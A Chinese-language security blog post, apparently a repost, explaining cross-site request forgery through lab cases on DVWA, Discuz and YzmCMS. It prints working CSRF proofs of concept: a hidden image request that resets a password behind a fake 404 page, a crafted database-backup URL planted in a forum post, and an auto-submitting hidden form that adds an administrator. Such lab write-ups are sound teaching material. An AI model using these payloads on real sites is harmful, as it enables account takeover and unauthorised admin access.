苏醒的巨人----CSRF

一.CSRF

跨站请求伪造(Cross-Site Request Forgery,CSRF)是指利用
受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点
击恶意链接或者访问包含攻击代码的页面,在受害人不知情的
情况下以受害者的身份向(身份认证信息所对应的)服务器发
送请求,从而完成非法操作(如转账、改密等)

1.可能出现的地方
所有的业务点都需要进行测试
1. 转账
2. 修改密码
3. 个人资料
4. 登陆
5. 加购物车、收藏商品
6. 开通业务
…

2.CSRF漏洞挖掘

csrf感觉好高级的漏洞,有点似懂非懂,还得沉淀,只能照抄老师的方法,等挖到才能自己整理好思路。

1275435-20180504220518141-602427596.png
1275435-20180504220553631-1003953371.png
1275435-20180504220633005-1545971306.png
1275435-20180504220734353-233594001.png
1275435-20180504220750863-567546875.png

二.几个案例

(1).dvwa,级别low

抓一个包,
1275435-20180504182615846-1190619991.png
get方式,只要把url给管理员打开就能修改他的密码。构造get网页

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Document</title>
</head>
<body>
  <img src="http://test.com/dvwa/vulnerabilities/csrf/?password_new=111&password_conf=111&Change=Change" border="0" style="display: none;">
  <h1>404</h1>
  <h2>page not found</h2>
</body>
</html>

打开这个页面,密码就会修改

(1). discuz cms 数据库备份csrf

通过双重认证
1275435-20180504184647560-1889044996.png
抓备份数据库的包

1275435-20180504184906012-854886742.png
第一个数据包为假的,过掉
http 参数污染
1275435-20180504185042115-791019992.png
在这构造
1275435-20180504185449289-219373793.png
csrf请求

http://test.com/dz/uc_server/admin.php?m=db&a=operate&t=export&appid=1&backupdir=backup_180504_9dJ7cL
http://test.com/dz/uc_server/admin.php?m=db&a=operate&t=export&appid=1&backupdir=sss&backupfilename=ldx

--还要将最后面的&与=URL编码一下

http://test.com/dz/uc_server/admin.php?m=db&a=operate&t=export&appid=1&backupdir=sss%26backupfilename%3Dldx

然后用普通用户去发帖,把payload放帖子里,让管理员访问触发漏洞
1275435-20180504190312814-2023000047.png
管理员游览后
1275435-20180504190445255-28504633.png

(3)yzcms 添加管理员csrf

在添加管理员处抓个包
1275435-20180504191806727-1536986043.png
是post请求可以尝试转换get请求
写个post的页面

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Document</title>
</head>
<body>
     <form name="poc" action="http://test.com/yzmcms/index.php/admin/admin_manage/add.html" method="POST" type="hidden">
      <input type="hidden" name="adminname" value="ldx" />
      <input type="hidden" name="password" value="ldxldx" />
      <input type="hidden" name="password2" value="ldxldx" />
      <input type="hidden" name="email" value="" />
      <input type="hidden" name="realname" value="" />
      <input type="hidden" name="roleid" value="1" />
      <input type="hidden" name="dosubmit" value="1" />
      <input type="submit" value="Submit request" style="display: none;" />
    </form>
</body>
<script>poc.submit();</script>
</html>

1275435-20180504192942515-897295805.png

1275435-20180504192733473-2034821145.png
成功添加用户
1275435-20180504192825177-1865068691.png

转载于:https://www.cnblogs.com/hackxf/p/CSRF.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值